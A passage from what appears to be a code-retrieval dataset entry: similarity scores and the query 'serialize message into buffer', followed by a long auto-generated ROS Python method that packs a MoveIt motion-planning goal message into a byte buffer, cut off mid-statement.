"0.6617578", "0.6607757", "0.66045326", "0.6603453", "0.6593575", "0.65652853", "0.6548455", "0.652192", "0.65206784", "0.65172404", "0.6508703", "0.649992", "0.6496085", "0.6477479", "0.64659375", "0.6447227", "0.64287496" ]
0.73519075
8
serialize message into buffer
def serialize(self, buff): try: _x = self buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_2I().pack(_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs)) _x = self.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs)) _x = self.goal.request.workspace_parameters.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_6d3I().pack(_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, _x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.request.start_state.joint_state.position)) length = len(self.goal.request.start_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.request.start_state.joint_state.velocity)) length = len(self.goal.request.start_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.request.start_state.joint_state.effort)) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.multi_dof_joint_state.transforms) 
buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.transforms: _v1 = val1.translation _x = _v1 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v2 = val1.rotation _x = _v2 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.request.start_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.twist: _v3 = val1.linear _x = _v3 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v4 = val1.angular _x = _v4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.wrench: _v5 = val1.force _x = _v5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v6 = val1.torque _x = _v6 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v7 = val1.object _v8 = _v7.header buff.write(_get_struct_I().pack(_v8.seq)) _v9 = _v8.stamp _x = _v9 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v8.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v7.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v10 = _v7.type _x = _v10.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v10.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v7.primitives) buff.write(_struct_I.pack(length)) for val3 in _v7.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.dimensions)) length = len(_v7.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.primitive_poses: _v11 = val3.position _x = _v11 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v12 = val3.orientation _x = _v12 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v7.meshes) buff.write(_struct_I.pack(length)) for val3 in _v7.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(_get_struct_3I().pack(*val4.vertex_indices)) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v7.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.mesh_poses: _v13 = val3.position _x = _v13 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v14 = val3.orientation _x = _v14 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v7.planes) buff.write(_struct_I.pack(length)) for val3 in _v7.planes: buff.write(_get_struct_4d().pack(*val3.coef)) length = len(_v7.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.plane_poses: _v15 = val3.position 
_x = _v15 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v16 = val3.orientation _x = _v16 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v7.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v7.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v7.subframe_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.subframe_poses: _v17 = val3.position _x = _v17 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v18 = val3.orientation _x = _v18 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v7.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v19 = val1.detach_posture _v20 = _v19.header buff.write(_get_struct_I().pack(_v20.seq)) _v21 = _v20.stamp _x = _v21 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v20.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v19.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v19.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v19.points) buff.write(_struct_I.pack(length)) for val3 in _v19.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.positions)) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.velocities)) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.accelerations)) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.effort)) _v22 = val3.time_from_start _x = _v22 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.request.start_state.is_diff)) length = len(self.goal.request.goal_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.goal_constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v23 = val2.header buff.write(_get_struct_I().pack(_v23.seq)) _v24 = _v23.stamp _x = _v24 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v23.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = 
len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v25 = val2.target_point_offset _x = _v25 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v26 = val2.constraint_region length = len(_v26.primitives) buff.write(_struct_I.pack(length)) for val4 in _v26.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val4.dimensions)) length = len(_v26.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v26.primitive_poses: _v27 = val4.position _x = _v27 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v28 = val4.orientation _x = _v28 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v26.meshes) buff.write(_struct_I.pack(length)) for val4 in _v26.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(_get_struct_3I().pack(*val5.vertex_indices)) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v26.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v26.mesh_poses: _v29 = val4.position _x = _v29 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v30 = val4.orientation _x = _v30 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v31 = val2.header buff.write(_get_struct_I().pack(_v31.seq)) _v32 = _v31.stamp _x = _v32 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v31.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v33 = val2.orientation _x = _v33 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v34 = val2.target_pose _v35 = _v34.header buff.write(_get_struct_I().pack(_v35.seq)) _v36 = _v35.stamp _x = _v36 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v35.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v37 = _v34.pose _v38 = _v37.position _x = _v38 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v39 = _v37.orientation _x = _v39 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v40 = val2.sensor_pose _v41 = _v40.header buff.write(_get_struct_I().pack(_v41.seq)) _v42 = _v41.stamp _x = _v42 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v41.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v43 = _v40.pose _v44 = _v43.position _x = _v44 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v45 = _v43.orientation _x = 
_v45 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) _x = self.goal.request.path_constraints.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.path_constraints.joint_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.joint_constraints: _x = val1.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(self.goal.request.path_constraints.position_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.position_constraints: _v46 = val1.header buff.write(_get_struct_I().pack(_v46.seq)) _v47 = _v46.stamp _x = _v47 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v46.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v48 = val1.target_point_offset _x = _v48 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v49 = val1.constraint_region length = len(_v49.primitives) buff.write(_struct_I.pack(length)) for val3 in _v49.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.dimensions)) length = len(_v49.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v49.primitive_poses: _v50 = val3.position _x = _v50 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v51 = val3.orientation _x = _v51 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v49.meshes) buff.write(_struct_I.pack(length)) for val3 in _v49.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(_get_struct_3I().pack(*val4.vertex_indices)) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v49.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v49.mesh_poses: _v52 = val3.position _x = _v52 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v53 = val3.orientation _x = _v53 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val1.weight)) length = len(self.goal.request.path_constraints.orientation_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.orientation_constraints: _v54 = val1.header buff.write(_get_struct_I().pack(_v54.seq)) _v55 = _v54.stamp _x = _v55 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v54.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v56 = val1.orientation _x = _v56 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) 
buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(self.goal.request.path_constraints.visibility_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.visibility_constraints: buff.write(_get_struct_d().pack(val1.target_radius)) _v57 = val1.target_pose _v58 = _v57.header buff.write(_get_struct_I().pack(_v58.seq)) _v59 = _v58.stamp _x = _v59 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v58.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v60 = _v57.pose _v61 = _v60.position _x = _v61 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v62 = _v60.orientation _x = _v62 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val1.cone_sides)) _v63 = val1.sensor_pose _v64 = _v63.header buff.write(_get_struct_I().pack(_v64.seq)) _v65 = _v64.stamp _x = _v65 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v64.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v66 = _v63.pose _v67 = _v66.position _x = _v67 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v68 = _v66.orientation _x = _v68 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.trajectory_constraints.constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.trajectory_constraints.constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v69 = val2.header buff.write(_get_struct_I().pack(_v69.seq)) _v70 = _v69.stamp _x = _v70 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v69.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v71 = val2.target_point_offset _x = _v71 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v72 = val2.constraint_region length = len(_v72.primitives) buff.write(_struct_I.pack(length)) for val4 in _v72.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val4.dimensions)) length = len(_v72.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v72.primitive_poses: _v73 = val4.position _x = _v73 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v74 = val4.orientation 
_x = _v74 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v72.meshes) buff.write(_struct_I.pack(length)) for val4 in _v72.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(_get_struct_3I().pack(*val5.vertex_indices)) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v72.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v72.mesh_poses: _v75 = val4.position _x = _v75 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v76 = val4.orientation _x = _v76 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v77 = val2.header buff.write(_get_struct_I().pack(_v77.seq)) _v78 = _v77.stamp _x = _v78 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v77.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v79 = val2.orientation _x = _v79 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v80 = val2.target_pose _v81 = _v80.header buff.write(_get_struct_I().pack(_v81.seq)) _v82 = _v81.stamp _x = _v82 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v81.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v83 = _v80.pose _v84 = _v83.position _x = _v84 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v85 = _v83.orientation _x = _v85 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v86 = val2.sensor_pose _v87 = _v86.header buff.write(_get_struct_I().pack(_v87.seq)) _v88 = _v87.stamp _x = _v88 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v87.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v89 = _v86.pose _v90 = _v89.position _x = _v90 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v91 = _v89.orientation _x = _v91 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.reference_trajectories) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.reference_trajectories: _v92 = val1.header buff.write(_get_struct_I().pack(_v92.seq)) _v93 = _v92.stamp _x = _v93 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v92.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.joint_trajectory: _v94 = 
val2.header buff.write(_get_struct_I().pack(_v94.seq)) _v95 = _v94.stamp _x = _v95 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v94.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.joint_names) buff.write(_struct_I.pack(length)) for val3 in val2.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.positions)) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.velocities)) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.accelerations)) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.effort)) _v96 = val3.time_from_start _x = _v96 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) length = len(val1.cartesian_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.cartesian_trajectory: _v97 = val2.header buff.write(_get_struct_I().pack(_v97.seq)) _v98 = _v97.stamp _x = _v98 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v97.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.tracked_frame length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: _v99 = val3.point _v100 = _v99.pose _v101 = _v100.position _x = _v101 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v102 = _v100.orientation _x = _v102 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _v103 = _v99.velocity _v104 = _v103.linear _x = _v104 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v105 = _v103.angular _x = _v105 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v106 = _v99.acceleration _v107 = _v106.linear _x = _v107 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v108 = _v106.angular _x = _v108 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v109 = val3.time_from_start _x = _v109 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) _x = self.goal.request.planner_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self.goal.request.group_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_i3d().pack(_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor)) _x = self.goal.planning_options.planning_scene_diff.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self 
buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, 